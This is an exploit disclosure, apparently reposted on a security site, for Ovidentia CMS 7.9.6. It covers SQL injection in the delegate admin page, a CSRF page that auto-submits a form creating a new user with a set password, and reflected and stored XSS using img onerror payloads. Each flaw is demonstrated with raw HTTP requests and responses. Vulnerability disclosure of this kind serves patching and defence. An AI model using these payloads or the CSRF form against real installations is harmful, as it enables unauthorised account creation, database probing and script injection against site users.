The Enigma Group

Ovidentia 7.9.6 - Multiple Vulnerabilities


###########################################################

[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities

[~] Author: sajith

[~] version: Ovidentia 7.9.6

[~]Vendor Homepage: http://www.ovidentia.org/

[~] vulnerable app link:http://www.ovidentia.org/telecharger

###########################################################



[1]SQL injection vulnerability





Log into admin panel and access delegate functionality > managing

 administrators where &id parameter (shown below link) is vulnerable to sql

injection



http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1



POC by sajith shetty:



request:



GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101

Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=



response:



style="cursor: pointer"

onclick="s=document.getElementById('babParam_1_5_0');

s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div

style="display: none; background-color: #EEEECC"

id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)

<i>called at</i>

[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute

query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>

<p><b>Database Error: You have an error in your SQL syntax; check the

manual that corresponds to your MySQL server version for the right syntax

to use near ''' at line 1</b></p>

<p>This script cannot continue, terminating.







[2]CSRF vulnerability



log into the admin portal and access the create user functionality

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=

using csrf vulnerability it was possible to add new user.



<head>

<title>POC by sajith shetty</title>

</head>

<body>

<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"

enctype="multipart/form-data" method="post" id="formid">

<input type="hidden" name="user[sendpwd]" value="0" />

<input type="hidden" name="user[password1]" value="P@ssw0rd1" />

<input type="hidden" name="user[notifyuser]" value="0" />

<input type="hidden" name="grp" value="" />

<input type="hidden" name="idx" value="Create" />

<input type="hidden" name="user[password2]" value="P@ssw0rd1" />

<input type="hidden" name="user[givenname]" value="POC" />

<input type="hidden" name="pos" value="A" />

<input type="hidden" name="widget_filepicker_job_uid[]"

value="52a35b7fac6c9" />

<input type="hidden" name="user[email]" value="poctester@xyz.com" />

<input type="hidden" name="user[nickname]" value="1234" />

<input type="hidden" name="user[sn]" value="test" />

<input type="hidden" name="tg" value="users" />

<input type="hidden" name="user[mn]" value="tester" />

</form>

<script>

document.getElementById('formid').submit();

</script>

</body>

</html>









[3]Reflected XSS



http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x

onerror=prompt(1);>



request:



GET

/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E

HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101

Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95





response:



 <div id="ovidentia_headbottomright">

<div>

<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :

http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->

<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x

onerror=prompt(1);>" title="Home"><img

src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"

/></a> 

<!-- Script OVML: show the list of the buttons of quick accesses to

functions by leaning on entries available in user section -->







[4]Stored xss



log into the admin portal and access mail functionlity and create new

domain using link below





http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y



here Name & Description field is vulnerable to stored XSS .payload:"><img

src=x onerror=prompt(1);>







request:





POST /cms/ovidentia-7-9-6/index.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101

Firefox/14.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer:

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y

Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95

Content-Type: application/x-www-form-urlencoded

Content-Length: 301



tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen





response:

<td>Registrierte User</td>

</tr>

<tr class="BabSiteAdminFontBackground">

<td>

<a href="

http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img

src=x onerror=prompt(111);></a>

</td>

<td>"><img src=x onerror=prompt(222);></td>

<td>Registrierte User</td>

</tr>

</table>

</td>

</tr>

</table>

<br>

</div>